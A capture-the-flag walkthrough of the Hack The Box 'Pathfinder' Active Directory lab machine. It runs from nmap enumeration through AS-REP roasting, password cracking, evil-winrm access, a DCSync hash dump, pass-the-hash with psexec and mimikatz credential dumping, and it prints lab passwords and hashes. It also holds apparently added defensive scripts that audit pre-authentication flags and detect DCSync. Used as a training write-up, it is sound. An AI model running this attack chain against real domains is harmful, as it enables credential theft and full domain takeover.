# Pathfinder Walkthrough

As I mentioned before, the Starting Point machines are a series of nine easy-rated machines that should be **rooted in sequence**. That means before you go through this box you must have completed the [Shield](https://shapmanasick.gitbook.io/starting-point-htb/shield-walkthrough) machine.

Enough talks, 🥱 Let’s Get It Started 🐱‍💻

{% hint style="danger" %}
**Disclaimer:** No flags (user/root) are shown in this writeup (as usual in writeups), so follow the procedure to grab the flags! 🐱‍👤
{% endhint %}

## 00. Start Machine …

To start the machine, just click "Join Machine".

![Pathfinder ](https://114191288-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MYKZU_ttgeJRDD_2odP%2F-MaEUtVo9_WyUvRwmCwd%2F-MaEVeG5FnToZfGM0SkP%2Fimage.png?alt=media\&token=80527a75-c0ba-4fad-b31f-caed1e2e416c)

Then you can see the **IP** address for that machine. Usually it is **`10.10.10.30` 🤠**

![10.10.10.30](https://114191288-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MYKZU_ttgeJRDD_2odP%2F-MaEUtVo9_WyUvRwmCwd%2F-MaEVp2aY2oIGboXm46j%2Fimage.png?alt=media\&token=653c86c8-adfe-4e17-8adf-9f6309e6d777)

Before moving on to the enumeration steps, we can simply ping the IP address to check our VPN connection and whether the machine is alive. Sometimes a machine's firewall blocks ping requests, but in most cases the ping succeeds! 🙂

```text
┌──(root💀Hidd3nWiki)-[~/Documents/Pathfinder]
└─# ping 10.10.10.30 -c 2
PING 10.10.10.30 (10.10.10.30) 56(84) bytes of data.
64 bytes from 10.10.10.30: icmp_seq=1 ttl=127 time=235 ms
64 bytes from 10.10.10.30: icmp_seq=2 ttl=127 time=237 ms

--- 10.10.10.30 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1005ms
rtt min/avg/max/mdev = 235.305/236.156/237.007/0.851 ms
```

{% hint style="info" %}
The ping reply has TTL=127. Windows hosts send with a default TTL of 128, and there is only one hop between the machine and us (the VPN), so this is definitely a Windows machine.
{% endhint %}

## 01. Enumeration First …

#### 01.1 Fast port scan

As usual, run a fast Nmap scan of all TCP ports to identify which ports are open.

```bash
nmap -n -vv --open -T4 -p- -oN AllPorts.nmap 10.10.10.30
```

```text
-n      : Never do DNS resolution
-vv     : Extra verbosity
--open  : Output only open ports
-p-     : Full TCP port range (1-65535)
-T4     : Aggressive timing template (4); assumes you are on a reasonably fast and reliable network
```

Here is the output 👇

```text
└─# nmap -n -vv --open -T4 -p- -oN AllPorts.nmap 10.10.10.30
Discovered open port 389/tcp on 10.10.10.30
Discovered open port 49676/tcp on 10.10.10.30
SYN Stealth Scan Timing: About 72.99% done; ETC: 11:27 (0:00:56 remaining)
Discovered open port 49714/tcp on 10.10.10.30
Discovered open port 49664/tcp on 10.10.10.30
Discovered open port 49667/tcp on 10.10.10.30
Discovered open port 636/tcp on 10.10.10.30
Discovered open port 88/tcp on 10.10.10.30
Discovered open port 9389/tcp on 10.10.10.30
Discovered open port 49666/tcp on 10.10.10.30
Discovered open port 3268/tcp on 10.10.10.30
Completed SYN Stealth Scan at 11:26, 173.96s elapsed (65535 total ports)
Nmap scan report for 10.10.10.30
Host is up, received echo-reply ttl 127 (0.24s latency).
Scanned at 2021-05-21 11:23:43 EDT for 175s
Not shown: 65466 closed ports, 45 filtered ports
Reason: 65466 resets and 45 no-responses
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT      STATE SERVICE          REASON
53/tcp    open  domain           syn-ack ttl 127
88/tcp    open  kerberos-sec     syn-ack ttl 127
135/tcp   open  msrpc            syn-ack ttl 127
139/tcp   open  netbios-ssn      syn-ack ttl 127
389/tcp   open  ldap             syn-ack ttl 127
445/tcp   open  microsoft-ds     syn-ack ttl 127
464/tcp   open  kpasswd5         syn-ack ttl 127
593/tcp   open  http-rpc-epmap   syn-ack ttl 127
636/tcp   open  ldapssl          syn-ack ttl 127
3268/tcp  open  globalcatLDAP    syn-ack ttl 127
3269/tcp  open  globalcatLDAPssl syn-ack ttl 127
5985/tcp  open  wsman            syn-ack ttl 127
9389/tcp  open  adws             syn-ack ttl 127
47001/tcp open  winrm            syn-ack ttl 127
49664/tcp open  unknown          syn-ack ttl 127
49665/tcp open  unknown          syn-ack ttl 127
49666/tcp open  unknown          syn-ack ttl 127
49667/tcp open  unknown          syn-ack ttl 127
49673/tcp open  unknown          syn-ack ttl 127
49676/tcp open  unknown          syn-ack ttl 127
49677/tcp open  unknown          syn-ack ttl 127
49683/tcp open  unknown          syn-ack ttl 127
49695/tcp open  unknown          syn-ack ttl 127
49714/tcp open  unknown          syn-ack ttl 127

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 174.50 seconds
           Raw packets sent: 85085 (3.744MB) | Rcvd: 80313 (3.213MB)
                                                                    
```

This is why I recommend scanning all the ports. Here you can see that many ports are open, and by looking at which ones (`ldap`, `kpasswd5` and `kerberos`) we can say with confidence that this machine is an Active Directory domain controller. We haven't touched that area before. Sharpen your Active Directory enumeration skills; it will be worth it if you want to try red-team activities.
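Reading the port table by eye works for one host, but the same judgement can be automated. The script below is an added example (not code from the writeup or from Nmap): it parses Nmap's normal `-oN` output, handles the `?` that `-sV` appends to a low-confidence service guess, pulls the domain name out of the LDAP banner, and decides whether the host exposes the Kerberos/LDAP/kpasswd combination that only a domain controller offers. The sample lines are copied from the service scan above; the port-to-role table is the documented set of domain-controller services, and the stripping of the trailing `0.` from the banner is my assumption that it is an Nmap banner artifact.

```python
"""Parse Nmap normal (-oN) output and report the Active Directory services
it exposes. Added example, not code from the original writeup or from Nmap.
The sample scan below is copied from the service scan of 10.10.10.30 above."""

import re

# Well-known domain-controller services (documented defaults, not from the page)
AD_SERVICE_PORTS = {
    53: "DNS",
    88: "Kerberos",
    135: "MS-RPC endpoint mapper",
    389: "LDAP",
    445: "SMB",
    464: "Kerberos password change (kpasswd)",
    593: "RPC over HTTP",
    636: "LDAPS",
    3268: "Global Catalog LDAP",
    3269: "Global Catalog LDAPS",
    5985: "WinRM over HTTP",
    9389: "Active Directory Web Services",
}

# Only a KDC / domain controller exposes all three of these together
DC_SIGNATURE = {88, 389, 464}

PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\w+)\s+(\S+)(.*)$")
DOMAIN_RE = re.compile(r"Domain:\s*([^,\)]+)")

SAMPLE_SCAN = """\
PORT      STATE  SERVICE       VERSION
53/tcp    open   domain        Simple DNS Plus
88/tcp    open   kerberos-sec  Microsoft Windows Kerberos (server time: 2021-05-21 22:54:30Z)
389/tcp   open   ldap          Microsoft Windows Active Directory LDAP (Domain: MEGACORP.LOCAL0., Site: Default-First-Site-Name)
445/tcp   open   microsoft-ds?
464/tcp   open   kpasswd5?
636/tcp   open   tcpwrapped
3268/tcp  open   ldap          Microsoft Windows Active Directory LDAP (Domain: MEGACORP.LOCAL0., Site: Default-First-Site-Name)
5985/tcp  open   http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49672/tcp closed unknown
"""


def open_ports(nmap_output):
    """Map open port -> {service, guessed, version} from -oN table lines.
    -sV appends '?' to a service it could only guess; strip it but keep
    a note that the identification was low-confidence."""
    ports = {}
    for line in nmap_output.splitlines():
        m = PORT_LINE.match(line.strip())
        if not m or m.group(3) != "open":
            continue
        service = m.group(4)
        ports[int(m.group(1))] = {
            "service": service.rstrip("?"),
            "guessed": service.endswith("?"),
            "version": m.group(5).strip(),
        }
    return ports


def assess(nmap_output):
    """Decide whether the host looks like a domain controller and pull the
    domain name out of the LDAP banner. Nmap prints the name with a trailing
    '0.' (assumed here to be a banner-parsing artifact), so strip it."""
    ports = open_ports(nmap_output)
    domain = None
    for info in ports.values():
        m = DOMAIN_RE.search(info["version"])
        if m:
            domain = m.group(1).rstrip("0.")
            break
    present = set(ports)
    return {
        "likely_dc": DC_SIGNATURE <= present,
        "missing_from_signature": sorted(DC_SIGNATURE - present),
        "domain": domain,
        "ad_services": {p: AD_SERVICE_PORTS[p] for p in sorted(ports) if p in AD_SERVICE_PORTS},
    }


if __name__ == "__main__":
    result = assess(SAMPLE_SCAN)
    print("likely domain controller:", result["likely_dc"], "domain:", result["domain"])
    for port, name in result["ad_services"].items():
        print(f"  {port:>5}  {name}")
```

Run it as-is to see the verdict for the scan above; feed it a different `-oN` file to get the same summary for another host. The `missing_from_signature` list is what tells you why a host was not classified as a DC, which is more useful than a bare false.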

{% hint style="info" %}
Active Directory is a directory service developed by Microsoft for Windows domain networks. It is included in most Windows Server operating systems as a set of processes and services. Initially, Active Directory was only in charge of centralized domain management. \[Copied from [Wikipedia](https://en.wikipedia.org/wiki/Active_Directory)]
{% endhint %}

#### 01.2 Run Nmap Scripting Engine

To get the best result, we can run the `Nmap Scripting Engine` (default scripts plus version detection) against the open ports only. Now that we know all of the open ports, we can target just those and the script scan finishes much faster than scanning the whole range again.

```text
┌──(root💀Hidd3nWiki)-[~/Documents/Pathfinder]
└─# nmap -sV -sC -oN DetailPorts.nmap -p 49667,49720,49676,49677,593,139,3269,389,9389,135,3268,49664,464,47001,636,49700,49665,49666,49672,5985,445,53,49683,88 10.10.10.30
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-21 11:43 EDT
Nmap scan report for 10.10.10.30
Host is up (0.23s latency).

PORT      STATE  SERVICE       VERSION
53/tcp    open   domain        Simple DNS Plus
88/tcp    open   kerberos-sec  Microsoft Windows Kerberos (server time: 2021-05-21 22:54:30Z)
135/tcp   open   msrpc         Microsoft Windows RPC
139/tcp   open   netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open   ldap          Microsoft Windows Active Directory LDAP (Domain: MEGACORP.LOCAL0., Site: Default-First-Site-Name)
445/tcp   open   microsoft-ds?
464/tcp   open   kpasswd5?
593/tcp   open   ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open   tcpwrapped
3268/tcp  open   ldap          Microsoft Windows Active Directory LDAP (Domain: MEGACORP.LOCAL0., Site: Default-First-Site-Name)
3269/tcp  open   tcpwrapped
5985/tcp  open   http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open   mc-nmf        .NET Message Framing
47001/tcp open   http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open   msrpc         Microsoft Windows RPC
49665/tcp open   msrpc         Microsoft Windows RPC
49666/tcp open   msrpc         Microsoft Windows RPC
49667/tcp open   msrpc         Microsoft Windows RPC
49672/tcp closed unknown
49676/tcp open   ncacn_http    Microsoft Windows RPC over HTTP 1.0
49677/tcp open   msrpc         Microsoft Windows RPC
49683/tcp open   msrpc         Microsoft Windows RPC
49700/tcp closed unknown
49720/tcp closed unknown
Service Info: Host: PATHFINDER; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 7h11m13s
| smb2-security-mode:
|   2.02:
|_    Message signing enabled and required
| smb2-time:
|   date: 2021-05-21T22:55:29
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 80.98 seconds
```

Because this is an Active Directory machine, our enumeration steps will be different. LDAP enumeration is pretty cool with [BloodHound](https://github.com/BloodHoundAD/BloodHound) because it presents the information graphically, but that is already done in the official writeup. So let's begin with my way. 😎😎

#### 01.3 Discover more about the domain

Nmap tells us the domain we are in (`Domain: MEGACORP.LOCAL`). And don't forget we already have credentials from the [Shield](https://shapmanasick.gitbook.io/starting-point-htb/oopsie-walkthrough#04-post-exploitation) machine: `sandra:Password1234!`. First we can try the [`ldapdomaindump`](https://github.com/dirkjanm/ldapdomaindump) tool. Let's start.

```bash
ldapdomaindump -u MEGACORP\\sandra -p Password1234! -o ldapinfo 10.10.10.30 --no-json --no-grep  
```

```text
-u    : DOMAIN\username for authentication, leave empty for anonymous authentication
-p    : Password or LM:NTLM hash, will prompt if not specified
-o    : Directory in which the dump will be saved (default: current)
--no-json    : Disable JSON output
--no-grep    : Disable Greppable output 
```

Here is the output, 👇👇

```text
┌──(root💀Hidd3nWiki)-[~/Documents/Pathfinder]
└─# ldapdomaindump -u MEGACORP\\sandra -p Password1234! -o ldapinfo 10.10.10.30
[*] Connecting to host...
[*] Binding to host
[+] Bind OK
[*] Starting domain dump
[+] Domain dump finished

┌──(root💀Hidd3nWiki)-[~/Documents/Pathfinder]
└─# cd ldapinfo

┌──(root💀Hidd3nWiki)-[~/Documents/Pathfinder/ldapinfo]
└─# ls
domain_users.html  domain_computers_by_os.html  domain_computers.html  domain_groups.html  domain_policy.html  domain_trusts.html  domain_users_by_group.html  
```

As you can see, there are a lot of HTML files here. Among them, I start with `domain_users.html`. You can open it in a browser, but instead I will use the [`html2text`](https://pypi.org/project/html2text/) tool. You can install it by typing `sudo apt-get install html2text`. The result looks like this. 👇👇

![](https://114191288-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MYKZU_ttgeJRDD_2odP%2F-MaF3QozWJmcpKh919-T%2F-MaF450Y1ipBJDWlXqT5%2Fimage.png?alt=media\&token=85ad8608-abeb-4e41-b865-131bb9c8a249)

There are 5 accounts here. `Guest`, `Administrator` and `krbtgt` are the default accounts; `sandra` and `svc_bes` are user-created ones. As you can see, I highlighted the `svc_bes` account because it has the **`DONT_REQ_PREAUTH`** flag enabled.

Now I'll briefly explain how Kerberos authentication works, because to understand what the `DONT_REQ_PREAUTH` flag means you first need to understand **Kerberos authentication**.

![](https://114191288-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MYKZU_ttgeJRDD_2odP%2F-MaF3QozWJmcpKh919-T%2F-MaF5pftRxID2hv08kO6%2Fimage.png?alt=media\&token=c0162370-9528-4d00-9132-23921274ab6c)

This diagram shows the normal authentication process. If the `DONT_REQ_PREAUTH` flag is set, the **second** and **third** steps of the process (the pre-authentication exchange, where the client proves it knows the password before the KDC answers) are skipped. That means anyone can request a ticket for that account directly, without knowing its password. Click [here](https://en.wikipedia.org/wiki/Kerberos_\(protocol\)) if you need more information about Kerberos authentication.
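The `DONT_REQ_PREAUTH` marker that `ldapdomaindump` prints is just one bit of the `userAccountControl` attribute. The script below is an added example, not code from the writeup or from `ldapdomaindump`: it decodes the documented `userAccountControl` bits, separates accounts that are exposed (flag set and account enabled) from ones that are flagged but disabled, and builds the LDAP filter an administrator can run against the directory to find the same thing. The account entries are constructed sample data (the real attribute values of the box's accounts are not shown on this page); the bit values and the `1.2.840.113556.1.4.803` matching-rule OID are Microsoft's documented ones.

```python
"""Audit userAccountControl values for accounts that skip Kerberos
pre-authentication. Added example, not part of the original writeup.
The flag bits are Microsoft's documented userAccountControl values; the
account entries below are constructed sample data, not the box's attributes."""

# Documented userAccountControl bits (subset)
UAC_FLAGS = {
    0x000002: "ACCOUNTDISABLE",
    0x000010: "LOCKOUT",
    0x000020: "PASSWD_NOTREQD",
    0x000200: "NORMAL_ACCOUNT",
    0x010000: "DONT_EXPIRE_PASSWORD",
    0x080000: "TRUSTED_FOR_DELEGATION",
    0x400000: "DONT_REQ_PREAUTH",
}
ACCOUNTDISABLE = 0x2
DONT_REQ_PREAUTH = 0x400000

# Constructed sample entries: (sAMAccountName, userAccountControl)
SAMPLE_ACCOUNTS = [
    ("Administrator", 0x10200),   # NORMAL_ACCOUNT | DONT_EXPIRE_PASSWORD
    ("Guest",         0x10222),   # disabled, password not required
    ("krbtgt",        0x202),     # disabled by design
    ("sandra",        0x10200),
    ("svc_bes",       0x410200),  # NORMAL_ACCOUNT | DONT_EXPIRE_PASSWORD | DONT_REQ_PREAUTH
    ("old_svc",       0x410202),  # pre-auth disabled, but the account is disabled too
]


def decode_uac(value):
    """Names of all known flags set in a userAccountControl integer, lowest bit first."""
    return [name for bit, name in sorted(UAC_FLAGS.items()) if value & bit]


def audit_preauth(accounts):
    """Split accounts with DONT_REQ_PREAUTH into the ones a KDC will answer
    for (enabled, so exposed to offline cracking of the AS-REP) and the
    ones that are disabled, which still deserve cleanup but are not live."""
    roastable, disabled = [], []
    for name, uac in accounts:
        if not uac & DONT_REQ_PREAUTH:
            continue
        (disabled if uac & ACCOUNTDISABLE else roastable).append(name)
    return {"roastable": roastable, "flagged_but_disabled": disabled}


def ldap_filter_preauth_disabled():
    """LDAP filter for enabled accounts with the flag set, to run against AD
    directly. 1.2.840.113556.1.4.803 is the LDAP_MATCHING_RULE_BIT_AND rule."""
    return ("(&(userAccountControl:1.2.840.113556.1.4.803:=%d)"
            "(!(userAccountControl:1.2.840.113556.1.4.803:=%d)))"
            % (DONT_REQ_PREAUTH, ACCOUNTDISABLE))


if __name__ == "__main__":
    for name, uac in SAMPLE_ACCOUNTS:
        print(f"{name:<14} {uac:#08x}  {', '.join(decode_uac(uac))}")
    print(audit_preauth(SAMPLE_ACCOUNTS))
    print(ldap_filter_preauth_disabled())
```

The disabled-account split matters in practice: `ldapdomaindump` will show the flag on a disabled account too, but the KDC will not issue tickets for it, so the enabled ones are the findings to fix first (clear the flag, or at least give those accounts long random passwords).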

## 02. Foothold

Now we are going to use [impacket's](https://github.com/SecureAuthCorp/impacket) `GetNPUsers.py` script to request the ticket for that account.

{% hint style="info" %}
If you don't have that script installed on your computer, run the commands below to install it.

```bash
sudo -s
cd /opt && git clone https://github.com/SecureAuthCorp/impacket.git && cd impacket
sudo python3 -m pip install .
sudo python3 setup.py install
cd examples/
```

{% endhint %}

Type the command below to request the ticket.

```bash
python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py MEGACORP.LOCAL/svc_bes -dc-ip 10.10.10.30 -request -no-pass -format john
```

```text
-request   : Requests TGT for users and output them in JtR/hashcat format (default False)
-no-pass   : Don't ask for password (useful for Kerberos authentication)
-dc-ip     : IP Address of the domain controller.
-format    : Format to save the AS_REQ of users without pre-authentication. Default is hashcat
```

Output will be like this. 👇👇

![](https://114191288-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MYKZU_ttgeJRDD_2odP%2F-MaF9_HgA1olEng68Sg8%2F-MaFFNxKA3w_1uNkP5pp%2Fimage.png?alt=media\&token=0443b0a3-dc25-4ecc-a1ae-d3b06f220310)

We grabbed the ticket. Now it's time to power up [John the Ripper](https://www.openwall.com/john/) and crack the hash. First save that hash to a file (here named `hash`), then run john. 🤠🤠

```bash
john hash --wordlist=/usr/share/wordlists/rockyou.txt
```

![](https://114191288-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MYKZU_ttgeJRDD_2odP%2F-MaF9_HgA1olEng68Sg8%2F-MaFGKeG3-X0fAQFlqxq%2Fimage.png?alt=media\&token=bbbba37e-e184-43d3-bb4f-144676234dd3)

We got the password for `svc_bes`!!!

* `svc_bes : Sheffield19`

![](https://114191288-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MYKZU_ttgeJRDD_2odP%2F-MaF9_HgA1olEng68Sg8%2F-MaFH4twxUdvuU656DgE%2Fimage.png?alt=media\&token=04c69c3c-7bc5-476d-aa0d-146abf08f9a1)

Now that we have the username and password, we can use the [Evil-WinRM](https://github.com/Hackplayers/evil-winrm) tool. You can install it by typing `gem install evil-winrm` and hitting enter. 😎😎

Now, don't you have a question ❓ We already have the username and password for the user **sandra**. Why didn't we use it? Because there is nothing of interest inside that account; it's just a plain user account.

Let's run the tool with the `svc_bes` account.

```bash
evil-winrm -u svc_bes -p Sheffield19 -i 10.10.10.30
```

![user.txt](https://114191288-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MYKZU_ttgeJRDD_2odP%2F-MaFHcLpM7vaCNtrd5wF%2F-MaFJjvf6c7xkjfloCKN%2Fimage.png?alt=media\&token=714e81c8-2f7f-41b5-bbf7-4574072fd891)

So we got the user flag. Now, time to escalate privileges.

## 03. Privilege Escalation

Now we are going to perform a [DCSync attack](https://www.qomplx.com/kerberos_dcsync_attacks_explained/) and dump the NTLM hashes of all domain users using Impacket's [secretsdump.py](https://raw.githubusercontent.com/SecureAuthCorp/impacket/master/examples/secretsdump.py) script. 😈😈 Let's try it.

```bash
/usr/share/doc/python3-impacket/examples/secretsdump.py MEGACORP.LOCAL/svc_bes:Sheffield19@10.10.10.30
```

Here is the output. 👇👇

![](https://114191288-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MYKZU_ttgeJRDD_2odP%2F-MaFHcLpM7vaCNtrd5wF%2F-MaFNNHT8ij_UjXd4Vsa%2Fimage.png?alt=media\&token=812cb165-e2ee-4b77-8ad7-9f606011a238)

As you can see, we have the NTLM hash for the Administrator account. We can use this to perform a **Pass The Hash attack** and gain elevated access to the system, and Impacket's [psexec.py](https://raw.githubusercontent.com/SecureAuthCorp/impacket/master/examples/psexec.py) can do that for us too.
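From the blue-team side, a DCSync like the one above is visible: the domain controller logs Security event 4662 with the replication extended rights in its `Properties` field, and the tell-tale is a subject that is not another domain controller. The script below is an added example (not from the writeup or from Impacket): it parses a few constructed, flattened 4662 records, recognises the three replication GUIDs (these are the real Active Directory extended-right GUIDs), and alerts only when the subject is not on the list of known DC machine accounts. The DC name `PATHFINDER$` comes from the Nmap `Service Info` line on this page; the key=value line format is a simplification I chose for the example, and the non-replication GUID in the third record is made up.

```python
"""Flag DCSync-style replication requests in Windows Security event 4662
records. Added example, not from the original writeup or from Impacket.
The events below are constructed and flattened to key=value form; a real
pipeline would read the XML from the Security log or a SIEM. The three
replication GUIDs are the real AD extended-right GUIDs; the DC account name
comes from the Nmap 'Service Info: Host: PATHFINDER' line on this page."""

import re

# Extended rights needed to replicate directory data (documented GUIDs)
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}

# Machine accounts that legitimately replicate with each other (allowlist)
KNOWN_DC_ACCOUNTS = {"PATHFINDER$"}

# Constructed sample events (simplified key=value rendering of 4662 fields)
SAMPLE_EVENTS = [
    # DC-to-DC replication: normal, must not alert
    'EventID=4662 SubjectUserName=PATHFINDER$ SubjectDomainName=MEGACORP ObjectType=domainDNS '
    'Properties="{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}" AccessMask=0x100',
    # a user account exercising replication rights: this is the DCSync signal
    'EventID=4662 SubjectUserName=svc_bes SubjectDomainName=MEGACORP ObjectType=domainDNS '
    'Properties="{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}" AccessMask=0x100',
    # ordinary directory access with a made-up, non-replication GUID: no alert
    'EventID=4662 SubjectUserName=sandra SubjectDomainName=MEGACORP ObjectType=user '
    'Properties="{deadbeef-0000-4000-8000-000000000001}" AccessMask=0x10',
    # unrelated event type: ignored
    'EventID=4624 SubjectUserName=sandra SubjectDomainName=MEGACORP LogonType=3',
]

KV_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')


def parse_event(line):
    """Turn one flattened event line into a dict of its fields."""
    return {key: quoted if quoted else bare for key, quoted, bare in KV_RE.findall(line)}


def replication_rights_in(properties):
    """Names of the replication extended rights present in a Properties field."""
    props = properties.lower()
    return [name for guid, name in REPLICATION_RIGHTS.items() if guid in props]


def detect_dcsync(lines, dc_accounts=KNOWN_DC_ACCOUNTS):
    """Return one alert per 4662 event in which a non-DC principal exercised
    a replication right. DC-to-DC replication produces the same GUIDs and is
    normal, so the allowlist of DC machine accounts is what keeps noise down."""
    allowed = {a.upper() for a in dc_accounts}
    alerts = []
    for line in lines:
        ev = parse_event(line)
        if ev.get("EventID") != "4662":
            continue
        rights = replication_rights_in(ev.get("Properties", ""))
        if not rights:
            continue
        subject = ev.get("SubjectUserName", "")
        if subject.upper() in allowed:
            continue
        alerts.append({"subject": f'{ev.get("SubjectDomainName", "")}\\{subject}', "rights": rights})
    return alerts


if __name__ == "__main__":
    for alert in detect_dcsync(SAMPLE_EVENTS):
        print("possible DCSync:", alert["subject"], "used", ", ".join(alert["rights"]))
```

Auditing of 4662 for directory-service access has to be enabled on the DCs for these events to exist at all, and the allowlist should be generated from the Domain Controllers OU rather than typed by hand; a stale list is the usual cause of missed detections after a new DC is promoted.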

See how much [impacket](https://github.com/SecureAuthCorp/impacket) helps us on this machine. Give respect to the [SecureAuth Corporation](https://www.secureauth.com/). 🙋‍♂️🙋‍♂️

#### 03.1 Perform Pass The Hash Attack

First, copy the Administrator's hash from the secretsdump output above in the form `LMhash:NThash` (the two hash values separated by a colon), leaving out the triple colon (`:::`) at the end, and then type this.

```bash
/usr/share/doc/python3-impacket/examples/psexec.py MEGACORP.LOCAL/Administrator@10.10.10.30 -hashes <LMhash:NThash>
```

![root.txt](https://114191288-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MYKZU_ttgeJRDD_2odP%2F-MaFPGC9ij8JayLKr9eX%2F-MaFRiIJWzuZi7ycEYi7%2Fimage.png?alt=media\&token=1b6c2824-a723-454d-8eea-994aee0d3a8e)

We got the root flag too!! 🧐🧐

![root.txt](https://114191288-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MYKZU_ttgeJRDD_2odP%2F-MaFZ_zx9jXgIWi5XmI5%2F-MaFZenwsSSxm4idP_Kx%2Fimage.png?alt=media\&token=98b7648b-1d84-4421-b53c-235e7d2819da)

## 04. Post Exploitation

Since these boxes are all connected, we are going to grab the local admin hash too. So let's upload [mimikatz](https://github.com/gentilkiwi/mimikatz/wiki). You can download `mimikatz` from [here](https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20210512/mimikatz_trunk.zip) and upload it to the box using Python's built-in web server.

```bash
wget https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20210512/mimikatz_trunk.zip && unzip mimikatz_trunk.zip && cd x64 && python3 -m http.server
```

```powershell
powershell.exe -c "IWR -UseBasicParsing http://<YourIP>:8000/mimikatz.exe -OutFile mcat.exe"
```

![](https://114191288-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MYKZU_ttgeJRDD_2odP%2F-MaFPGC9ij8JayLKr9eX%2F-MaFTCebuAq2p55qALYz%2Fimage.png?alt=media\&token=a9f8f720-d772-4d22-bf52-7f14a3fdb656)

Then we can run that file by typing `.\mcat`, and then run the `lsadump::sam` command.

![](https://114191288-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MYKZU_ttgeJRDD_2odP%2F-MaFPGC9ij8JayLKr9eX%2F-MaFVUjWTVrs7MfwbN4e%2Fimage.png?alt=media\&token=4b7381e5-b523-4a4a-88d5-dc45afc5c074)

Here is the hash : 7facdc498ed1680c4fd1448319a8c04f

You can look it up on the [CrackStation](https://crackstation.net/) site.

![](https://114191288-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MYKZU_ttgeJRDD_2odP%2F-MaFVfK7TEHx4qpr0UnI%2F-MaFX51eTjy22bDTPq1y%2Fimage.png?alt=media\&token=9968dc48-bcc7-4baf-b418-114c36f1ef37)

The password is : `Password!`

Finally, we are done. From here on you need a VIP or VIP+ membership to play with the other boxes.

Okay... I'll see you on the next box! 🙋‍♂️🙋‍♂️

![](https://114191288-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MYKZU_ttgeJRDD_2odP%2F-MaFYGcfEGWqroDWh_E5%2F-MaFYJtpWXyxsXv3xc10%2Fimage.png?alt=media\&token=0763dbb9-6089-45de-b213-2139fcad6de3)

**Find me on** [@twitter](https://twitter.com/ShapManasick)
